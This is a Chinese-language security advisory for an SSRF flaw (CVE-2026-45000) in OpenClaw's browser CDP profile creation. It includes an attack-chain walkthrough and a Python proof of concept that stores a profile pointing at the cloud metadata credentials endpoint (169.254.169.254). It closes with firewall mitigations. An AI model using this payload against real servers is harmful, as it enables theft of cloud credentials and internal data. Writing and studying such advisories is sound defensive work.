CVE-2026-45000 OpenClaw SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-45000

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

5.0 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.20之前版本在浏览器CDP配置文件创建功能中存在SSRF漏洞。该漏洞允许攻击者绕过严格模式的SSRF策略检查，创建指向私有网络或云元数据端点的恶意配置文件。这些配置文件会被存储，并在后续的状态检查操作中被服务器探测，从而导致内网信息泄露或云凭证窃取。

技术细节

该漏洞的核心在于OpenClaw处理浏览器CDP（Chrome DevTools Protocol）配置文件创建时的逻辑缺陷。系统未在此接口实施严格模式的SSRF（服务器端请求伪造）防护机制，导致攻击者能够输入任意URL。攻击者首先通过API接口提交包含恶意URL（例如指向内网管理后台、数据库端口或云厂商元数据服务169.254.169.254）的配置文件创建请求。服务器接收后，将该配置持久化存储。漏洞的关键触发点在于后续的自动化运维流程，当系统周期性执行“profile status operations”以检查配置文件状态时，会直接从服务器端向存储的恶意URL发起请求。这种“存储型”SSRF使得攻击者可以利用服务器的身份进行内网横向移动，窃取敏感元数据，甚至结合其他漏洞进行远程代码执行。

攻击链分析

STEP 1

1. 侦察与准备

攻击者识别出目标运行的是OpenClaw 2026.4.20之前的版本，并准备好指向内网敏感资源（如AWS元数据服务）的URL。

STEP 2

2. 发起SSRF请求

攻击者利用低权限账户，通过浏览器CDP配置文件创建接口提交恶意请求，将内网URL封装在配置文件中。

STEP 3

3. 存储恶意配置

由于系统跳过了严格模式SSRF检查，服务器接收并保存了包含内网地址的配置文件。

STEP 4

4. 触发探测

当OpenClaw系统在后台执行常规的配置文件状态检查任务时，自动向攻击者预设的内网地址发起HTTP请求。

STEP 5

5. 数据泄露

内网服务响应请求，将敏感数据（如云实例凭证）返回给OpenClaw服务器，攻击者可通过响应日志或回显获取信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target API endpoint for creating CDP profiles
target_url = "http://vulnerable-openclaw-instance/api/v1/cdp/profiles"

# Attacker controlled payload pointing to internal metadata service
# This bypasses the strict-mode SSRF check mentioned in the CVE
payload = {
    "profile_name": "Internal_Scan",
    "endpoint": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "browser_type": "chrome"
}

# Headers with low-privilege authentication token
headers = {
    "Authorization": "Bearer <low_priv_token>",
    "Content-Type": "application/json"
}

try:
    # Step 1: Create the stored profile
    response = requests.post(target_url, json=payload, headers=headers)
    
    if response.status_code == 201:
        print("[+] Malicious profile created successfully.")
        print("[+] The server will now probe the internal metadata endpoint during routine status checks.")
    else:
        print("[-] Failed to create profile. Status code:", response.status_code)
        print("[-] Response:", response.text)
        
except Exception as e:
    print("Error:", str(e))

影响范围

OpenClaw < 2026.4.20

防御指南

临时缓解措施

如果不能立即升级，建议在网络层面通过防火墙或安全组规则阻断OpenClaw服务器对RFC1918定义的内网地址（如10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16）及链路本地地址（169.254.0.0/16）的出站访问，以防止SSRF探测。